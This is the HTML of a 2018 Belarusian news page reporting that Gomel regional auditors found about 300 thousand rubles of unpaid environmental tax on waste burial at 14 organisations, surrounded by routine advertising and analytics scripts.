<!DOCTYPE html>
<html lang="ru">
	<head>
		<meta property="og:title" content="На Гомельщине КГК установил факты неуплаты экологического налога почти на 300 тыс. рублей"/>
<meta property="og:image" content="https://gomel.today/uploads/News/2018/11/19/119-kgk.jpg"/>
<meta property="og:type" content="article"/>
		<title>На Гомельщине КГК установил факты неуплаты экологического налога почти на 300 тыс. рублей :: Сильные Новости — Гомель сегодня</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		
		<meta http-equiv="cache-control" content="public">
		<meta http-equiv="content-type" content="text/html; charset=UTF-8">		
		<meta name="robots" content="all">
		<meta name="document-state" content="dynamic">
		<meta name="revisit" content="3">
		<meta name="distribution" content="global">
		<meta name="audience" content="all">
		<meta name="publisher-location" content="by">
				
		<link rel="shortcut icon" type="image/gif" href="/favicon.gif">	
		<link href="https://fonts.googleapis.com/css?family=Roboto:400,500,700&amp;subset=cyrillic" rel="stylesheet">
		
		<link href="/templates/today/bootstrap/css/bootstrap.min.css" rel="stylesheet">
		<link href="/templates/today/css/style.css" rel="stylesheet" type="text/css" media="screen">
		<script src="/templates/today/js/jquery.js" type="text/javascript"></script>
		<script src="/templates/today/js/jquery.step.js" type="text/javascript"></script>
		<script src="/templates/today/bootstrap/js/bootstrap.min.js"></script>
		<script src="/templates/today/js/tool.js" type="text/javascript"></script>
		<script type="text/javascript" src="/templates/today/js/adriver.core.2.js"></script> 
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rss/rss-2.xml" title="Все материалы сайта Сильные Новости">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/gomel/rss/" title="Новости Гомельской области">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/belarus/rss/" title="Новости Беларуси">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/world/rss/" title="Мировые новости">
		
		<base href="https://gomel.today/"> 
		<script>
			var ave_path = "/";
			var ave_theme = "today";  
		</script>
		<script type='text/javascript'> (function() { var w = window, d = document, protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:', aml = typeof admixerML !== 'undefined' ? admixerML : { }; aml.fn = aml.fn || []; aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/'); aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/'); if (!w.admixerML) { var lodash = document.createElement('script'); lodash.id = 'amlScript'; lodash.async = true; lodash.type = 'text/javascript'; lodash.src = aml.cdnPath + 'scripts3/loader2.js'; var node = d.getElementsByTagName('script')[0]; node.parentNode.insertBefore(lodash, node); w.admixerML = aml; } })(); </script>
		<script type='text/javascript'> admixerML.fn.push(function() { admixerML.defineSlot({z: 
			'1a57c481-e6b6-4964-a46d-5043ae76cce1', ph: 'admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '033d7154-161a-4441-b055-d3711546beb5', ph: 'admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 		
			admixerML.defineSlot({z: '428e2a36-53d5-49ed-88c7-8e27ee98e7b7', ph: 'admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '3e3d8d76-026c-4d53-ac80-6ab6168fb68a', ph: 'admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '23d1f7ac-c376-4ade-8e80-7a0d1a40362b', ph: 'admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '9f9fc002-852a-4c97-a9cb-d1b8419260ec', ph: 'admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247', i: 'inv-nets'});
			admixerML.singleRequest(); }); 
		
</script>
		<!-- Push-уведомления -->
		<script charset="UTF-8" src="//cdn.sendpulse.com/28edd3380a1c17cf65b137fe96516659/js/push/17dddc9de258763ae65d98c801237045_1.js" async></script>

		
		<script type="text/javascript" src="/templates/today/js/vverh.js"></script>
	</head>

	<body>
		
	<!-- (C)2000-2015 Gemius SA - gemiusAudience / odsgomel.org / Home Page -->
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = '.XqQ.Ws8oyVXECxDR2jXPLbvXtDkpS_CMr2Ss64S3G7..7';
// lines below shouldn't be edited
function gemius_pending(i) { window[i] = window[i] || function() {var x = window[i+'_pdata'] = window[i+'_pdata'] || []; x[x.length]=arguments;};};
gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
(function(d,t) {try {var gt=d.createElement(t),s=d.getElementsByTagName(t)[0],l='http'+((location.protocol=='https:')?'s':''); gt.setAttribute('async','async');
gt.setAttribute('defer','defer'); gt.src=l+'://gaby.hit.gemius.pl/xgemius.js'; s.parentNode.insertBefore(gt,s);} catch (e) {}})(document,'script');
//--><!]]>
</script>

		<!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter3051520 = new Ya.Metrika({
                    id:3051520,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/3051520" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
       <!--LiveInternet counter--><script type="text/javascript"><!--
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();//--></script><!--/LiveInternet-->
        <!-- Баннер №1 
<div id='admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247'></div> 
		<script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247'); }); </script> --> 
		 <div style="#background:linear-gradient(to right, #605b72 50%, #605b72 50%);" class="bann1">			
			<div class="container" style="margin:auto;">								
					
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=534" class="banner_max_width"><img style="width:100%" src="/modules/media/files/17-11.gif" alt="Стройка 17/11 (14:00) - : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=534" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/17-11.gif" alt="Стройка 17/11 (14:00) - : " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=534" class="banner_small_width"><img style="width:100%" src="/modules/media/files/17-11.gif" alt="Стройка 17/11 (14:00) - : " border="0" /></a>
							</div>
		</div>

		<!-- Яндекс --><!-- <div class="container">
<div id="yandex_rtb_R-A-150149-23"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-23",
                renderTo: "yandex_rtb_R-A-150149-23",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
	</script></div>  -->
		<header>
			<div class="container">
				<div class="pull-left">
					<a href="/" class="logo"><img src="/templates/today/images/logo.png" alt="" class="img-responsive"></a>
				</div>
				<div class="pull-right">
					<nav class="navbar navbar-default">	<div class="container-fluid">		<!-- Brand and toggle get grouped for better mobile display -->		<div class="navbar-header">			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">				<span class="icon-bar"></span>				<span class="icon-bar"></span>				<span class="icon-bar"></span>			</button>		</div>		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">			<ul class="nav navbar-nav list-inline">							<li><a href="/rus/news/gomel/">Гомель и область</a></li><li><a href="/rus/news/belarus/">Беларусь</a></li><li><a href="/rus/news/world/">В мире</a></li><li><a href="https://gomel.today/key/tag/%D0%A2%D0%B0%D0%BA%D0%B0%D1%8F%20%D0%B6%D0%B8%D0%B7%D0%BD%D1%8C">Такая жизнь</a></li>				<li>					<a href="/index.php?module=search&ts=0" class="sprite search"></a>				</li>				<li>					<a href="https://gomel.today/archive" class="sprite archive"></a>				</li>			</ul>		</div>	</div></nav>
				</div>
			</div>

			<div class="clearfix"></div>

			<nav>
				<div class="container text-center">
					<!-- <ul class="list-inline">	<li><a href="/map/">Районы</a></li><li><a href="key/tag/Главное">Главное</a></li><li><a href="key/tag/Криминал">Криминал</a></li><li><a href="key/tag/Происшествия">ДТП и ЧП</a></li><li><a href="key/tag/Авто">Авто</a></li><li><a href="key/tag/%D0%90%D1%84%D0%B8%D1%88%D0%B0">Афиша</a></li><li><a href="key/tag/Политика">Политика</a></li><li><a href="key/tag/Экономика">Экономика</a></li><li><a href="key/tag/Общество">Общество</a></li><li><a href="key/tag/Спорт">Спорт</a></li><li><a href="key/tag/Погода">Погода</a></li><li><a href="key/tag/Шапито">Шапито</a></li><li><a href="blogs">Блоги</a></li><li><a href="key/tag/%D0%93%D1%80%D0%B0%D0%B6%D0%B4%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B5_%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE">Гражданское общество</a></li></ul> --><nav class="navbar navbar-default">	<div class="container-fluid">		<!-- Brand and toggle get grouped for better mobile display -->		<div class="navbar-header">			<button type="button" class="navbar-toggle navbar-toggle2 collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-2" aria-expanded="false">				<span class="icon-bar"></span>				<span class="icon-bar"></span>				<span class="icon-bar"></span>			</button>		</div>		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-2">			<ul class="list-inline">							<li><a href="/map/">Районы</a></li><li><a href="key/tag/Главное">Главное</a></li><li><a href="key/tag/Криминал">Криминал</a></li><li><a href="key/tag/Происшествия">ДТП и ЧП</a></li><li><a href="key/tag/Авто">Авто</a></li><li><a href="key/tag/%D0%90%D1%84%D0%B8%D1%88%D0%B0">Афиша</a></li><li><a href="key/tag/Политика">Политика</a></li><li><a href="key/tag/Экономика">Экономика</a></li><li><a href="key/tag/Общество">Общество</a></li><li><a href="key/tag/Спорт">Спорт</a></li><li><a href="key/tag/Погода">Погода</a></li><li><a href="key/tag/Шапито">Шапито</a></li><li><a href="blogs">Блоги</a></li><li><a href="key/tag/%D0%93%D1%80%D0%B0%D0%B6%D0%B4%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B5_%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE">Гражданское общество</a></li>			</ul>		</div>	</div></nav>
				</div>
			</nav>
		</header>

		<main>
			
			<!-- Баннер №2 --> <div style="margin-bottom:10px; background-color: transparent;" class="container">
			
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=535" class="banner_max_width"><img style="width:100%" src="/modules/media/files/cristmas_keramin.jpg" alt="Керамин 19/11 - 23/11 2018: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=535" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/cristmas_keramin.jpg" alt="Керамин 19/11 - 23/11 2018: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=535" class="banner_small_width"><img style="width:100%" src="/modules/media/files/cristmas_keramin.jpg" alt="Керамин 19/11 - 23/11 2018: " border="0" /></a>
							</div>

			<div class="container">
				<div class="row">
					<div class="col-md-8">
						<article itemscope itemtype="http://schema.org/Article">	
	<h1 itemprop="name">На Гомельщине КГК установил факты неуплаты экологического налога почти на 300 тыс. рублей</h1>
		<ul class="list-inline small-desc">
			<li class="date">19 ноября 2018, 16:49</li>
			<li class="view"><i class="sprite sview"></i> 242</li>
			<li class="comment"><i class="sprite scomment"></i> 0</li>
		</ul>	
		<img src="/uploads/News/2018/11/19/119-kgk.jpg" alt="" class="img-responsive img-center img-mainphoto">
		<!-- Реклама Яндекс --> 
			<br>



<!-- Yandex.RTB R-A-150149-12 -->
<div id="yandex_rtb_R-A-150149-12"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-12",
                renderTo: "yandex_rtb_R-A-150149-12",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>



<br>
		<div class="show_caption img-center">
			<div itemprop="description">
				<p>Комитет государственного контроля Гомельской области установил нарушения законодательства в&nbsp;ходе мониторинга соблюдения порядка исчисления и&nbsp;уплаты экологического налога за&nbsp;захоронение отходов производства в&nbsp;2016–2018&nbsp;годах.</p>
			</div>
			<p>Так, отходы производства строительной организации массой 2,7&nbsp;тыс. тонн за&nbsp;четвертый квартал 2015 года были захоронены на&nbsp;полигоне Петриковского района, при этом экологический налог в&nbsp;установленный законодательством срок не&nbsp;перечислен на&nbsp;расчетный счет владельца полигона (организации ЖКХ). Это привело к&nbsp;недоплате в&nbsp;бюджет свыше 100&nbsp;тыс. рублей.</p>
<p>Аналогичные нарушения требований Налогового кодекса выявлены в&nbsp;14&nbsp;организациях Гомельской области. Общий размер не&nbsp;уплаченного в&nbsp;бюджет экологического налога составил около 300&nbsp;тыс. рублей.</p>
<p>По&nbsp;результатам мониторинга субъектам хозяйствования выданы рекомендации об&nbsp;устранении выявленных нарушений и&nbsp;уплате экологического налога за&nbsp;захоронение отходов производства.</p>
			<br><br>
			<!-- InPage -->
			<div id="inpage_VI-276906-0"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: 'VI-276906-0',
                renderTo: 'inpage_VI-276906-0',
                inpage: {
                    /* Впишите дополнительные параметры */
                },
            }, function callback (params) {
                // callback
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
		</div>
		<br>
		<div class="source-news"> 
			<a href='https://naviny.by/new/20181119/1542634162-na-gomelshchine-kgk-ustanovil-fakty-neuplaty-ekologicheskogo-naloga-pochti' target='_blank'>Naviny.by</a> 
		</div>
</article>			
<div class="mods-news-text">
	<!-- Баннер №4 -->
		

					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=418" class="banner_max_width"><img style="width:100%" src="/modules/media/files/97797__rubeleco.jpg" alt="Рубелэко 30/07 - 05/07 08/10 - 14/10 2018 19/11 - 25/11 2018: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=418" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/97797__rubeleco.jpg" alt="Рубелэко 30/07 - 05/07 08/10 - 14/10 2018 19/11 - 25/11 2018: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=418" class="banner_small_width"><img style="width:100%" src="/modules/media/files/97797__rubeleco.jpg" alt="Рубелэко 30/07 - 05/07 08/10 - 14/10 2018 19/11 - 25/11 2018: " border="0" /></a>
				</div>
<div class="mods-news-text"><tqwgtplaceholder holdername="embedded_1531996220320"></tqwgtplaceholder></div>
<div>
	<div class="teleg">Мы создали канал в Телеграме для того, чтобы быстро рассказывать вам новости → <a href="https://t.me/gomeltoday" target="_blank">https://t.me/gomeltoday</a>		</div>
</div>
<div class="mods-news-text">
	<noindex>
		<div>
			<script src="//yastatic.net/es5-shims/0.0.2/es5-shims.min.js"></script>
			<script src="//yastatic.net/share2/share.js"></script>
				<div class="ya-share2" data-services="vkontakte,facebook,odnoklassniki,twitter,viber,telegram,skype" data-counter="">
				</div>	
		</div>		
	</noindex>
</div>
<div>
     <div style="display: inline-block; margin: 0px 10px 10px 0px;"><a href="https://telegram.me/gomeltoday" target="_blank"><img src="/uploads/images/teleg_read.jpg"></a></div>
     <div style="display: inline-block; margin: 10px 10px 10px 0px;"><a href="https://vk.com/gomeltoday" target="_blank"><img src="/uploads/images/vk_read.jpg"></a></div>
	<div style="display: inline-block; margin: 10px 0px 10px 0px;"><a href="https://www.instagram.com/gomeltoday/" target="_blank"><img src="/uploads/images/insta_read.jpg"></a></div>
</div>
<div class="mods-news-text">
	<!-- Yandex.RTB R-A-150149-8 -->
		<div id="yandex_rtb_R-A-150149-8">
		</div>
		<script type="text/javascript">
    	(function(w, d, n, s, t) {
        	w[n] = w[n] || [];
        	w[n].push(function() {
            	Ya.Context.AdvManager.render({
                	blockId: "R-A-150149-8",
                	renderTo: "yandex_rtb_R-A-150149-8",
                	horizontalAlign: true,
               		async: true
            	});
        	});
        	t = d.getElementsByTagName("script")[0];
        	s = d.createElement("script");
        	s.type = "text/javascript";
        	s.src = "//an.yandex.ru/system/context.js";
        	s.async = true;
        	t.parentNode.insertBefore(s, t);
    		})(this, this.document, "yandexContextAsyncCallbacks");
		</script>
</div>	
<div id='admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247');
});
</script><!-- БЛОК -->
<div class="mods-news-text">
			<p><b>Метки:</b> <a class="black" href="/key/tag/Происшествия">Происшествия</a> (13386), <a class="black" href="/key/tag/Область">Область</a> (6210), <a class="black" href="/key/tag/Экономика">Экономика</a> (13903)</p></div>


<div class="mods-news-text">
	<div class="grey_title close_mobile">
		Комментарии <abbr title="В комментариях под новостями запрещены и подпадают под удаление:

1. Нецензурная лексика
2. Оскорбление других читателей и сотрудников редакции
3. Спам
4. Оффтоп
5. Хронический троллинг
6. Комментирование с фейковых аккаунтов
7. Язык ненависти, разжигание розни по любому признаку
8. Любые комментарии, нарушающие законодательство Республики Беларусь
9. Администрация оставляет за собой право удалить любой комментарий без объяснения причин"><small><u>правила</u></small></abbr>
	</div>
	<div class="grey_body close_mobile">	
		 
		<div class="tolstoycomments-feed">
		</div>
			<script type="text/javascript">!(function(w,d,s,l,x){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=!0;j.src='//web.tolstoycomments.com/sitejs/app.js?i='+l+'&x='+x+'&t='+(new Date().getTime());f.parentNode.insertBefore(j,f)})(window,document,'script','tolstoycomments','297');
		window.tolstoycomments.config = { 
        desktop_class: 'tolstoycomments-feed'
    };
		</script>
	</div><br><br>
	<!-- Yandex.RTB R-A-150149-15
<div id="yandex_rtb_R-A-150149-15"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-15",
                renderTo: "yandex_rtb_R-A-150149-15",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>  -->
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="3849893488"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
	<br><br>
	<!-- Партнеры--><div class="mods-news-text">	
		<div id="M357979ScriptRootC673237"  style="margin-top: -50px !important;">
				<div id="M357979PreloadC673237">
				Загрузка...    </div>
				<script>
						(function(){
					var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
					var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673237")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
					catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673237");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673237;c[ac](dv);
					var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673237.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
			</script>
		</div>		
</div>
	<!-- Yandex.RTB R-A-150149-15
<div id="yandex_rtb_R-A-150149-15"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-15",
                renderTo: "yandex_rtb_R-A-150149-15",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>  -->
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="3849893488"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
					</div>
					<div class="col-md-4">				
						 
				<br> <!-- <div id='admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'); }); </script> -->

		<div style="width:240px; margin:auto;">
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=519" class="banner_max_width"><img style="width:100%" src="/modules/media/files/44634__240x400.gif" alt="Тривижн 04/11 - 30/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=519" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/44634__240x400.gif" alt="Тривижн 04/11 - 30/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=519" class="banner_small_width"><img style="width:100%" src="/modules/media/files/44634__240x400.gif" alt="Тривижн 04/11 - 30/11: " border="0" /></a>
				</div> 
						
						<div class="most_read most_comment article_comment article_left_block"><h4>Самое обсуждаемое</h4><ul class="list-unstyled"><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/gomel-10918/" title="В Гомеле в автобусе из-за резкого торможения упала пассажирка, пришлось обращаться за медпомощью">В Гомеле в автобусе из-за резкого торможения упала пассажирка, пришлось обращаться за медпомощью</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/belarus-8338/" title="Посольство Беларуси в России проверяет сведения о гибели белоруса при взрыве под Петербургом">Посольство Беларуси в России проверяет сведения о гибели белоруса при взрыве под Петербургом</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/world-3649/" title="США втягивают Россию в гонку вооружений: Трамп заявил о выходе из договора о ракетах средней дальности">США втягивают Россию в гонку вооружений: Трамп заявил о выходе из договора о ракетах средней дальности</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/belarus-8339/" title="В Минске на предприятии случилось ЧП: взорвалась паровая установка, есть пострадавшие — фото">В Минске на предприятии случилось ЧП: взорвалась паровая установка, есть пострадавшие — фото</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/belarus-8340/" title="Будут корректироваться действующие законы: МВД отказалось от законопроекта о противодействии домашнему насилию">Будут корректироваться действующие законы: МВД отказалось от законопроекта о противодействии домашнему насилию</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/gomel-10919/" title="Полный аврал в Гомеле: как готовят город к визиту Лукашенко и Порошенко">Полный аврал в Гомеле: как готовят город к визиту Лукашенко и Порошенко</a></p></li><li ><div class="pull-left"><i class="sprite comment"></i> 0</div><p><a href="/rus/news/world-3650/" title="Опубликовано полное видео бойни в керченском колледже">Опубликовано полное видео бойни в керченском колледже</a></p></li></ul></div><br>
						<div id='admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247'); }); </script>
						<br>
						<div class="most_read most_comment article_comment article_left_block">
	<h4>Новости партнеров</h4>
		<div id="M357979ScriptRootC673093"  style="margin-top: -50px !important;">
        <div id="M357979PreloadC673093">
        Загрузка...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M357979ScriptRootC673093")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M357979ScriptRootC673093");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=673093;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/g/o/gomel.today.673093.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
		</script>
		</div>
</div>
						
						<div class="most_read last_blog article_left_block"><a href="/blogs" target="_blank"><h4>Новое в блогах</h4></a><ul class="list-unstyled"><li class="text-danger"><img src="/uploads/avatar/f_dfa2cc6df75452fedac37243bbe632a244.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">17 ноября 2018</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Общество Гомель</div><a href="/111028/">СКАЗКИ НА НОЧЬ#2 новости /Общество Гомель</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_5b40d5031729f6c19797a009b8fbd7b936.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">16 ноября 2018</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Наташа Богданова</div><a href="/111004/">Лукашенко боится нестабильности! Главные новости Беларуси. ПАРОДИЯ #7</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_dfa2cc6df75452fedac37243bbe632a244.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">14 ноября 2018</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Общество Гомель</div><a href="/110905/">Сказки на ночь новости#1 Общество Гомель</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_dfa2cc6df75452fedac37243bbe632a244.jpg" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">13 ноября 2018</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Общество Гомель</div><a href="/110841/">БЛЯД***ОЕ ОТНОШЕНИЕ ИЛИ КАК ПРИВЛЕКАЮТ ИНВЕСТИЦИИ ЛУКАШИЗМ ГОЛОВНОГО МОЗГА</a></div></li><li class="text-danger"><img src="/uploads/avatar/f_265acbbf175fe48292f37e03f8d0a32017.png" class="img-responsive pull-left"><div class="desc"><ul class="list-inline small-desc"><li class="date">11 ноября 2018</li><li class="comment"><i class="sprite scomment"></i> 0</li></ul><div class="author">Патологоанатом Padolski</div><a href="/110798/">Отвага и самоотверженность рядом с нами</a></div></li></ul></div>	
						
						<!-- Баннер №5 -->
						<br><div style="margin:auto; width:240px;">
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=533" class="banner_max_width"><img style="width:100%" src="/modules/media/files/ksk_18-19_gt240x400.gif" alt="Ksk 18/11 20:00 - 19/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=533" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/ksk_18-19_gt240x400.gif" alt="Ksk 18/11 20:00 - 19/11: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=533" class="banner_small_width"><img style="width:100%" src="/modules/media/files/ksk_18-19_gt240x400.gif" alt="Ksk 18/11 20:00 - 19/11: " border="0" /></a>
				</div>
															
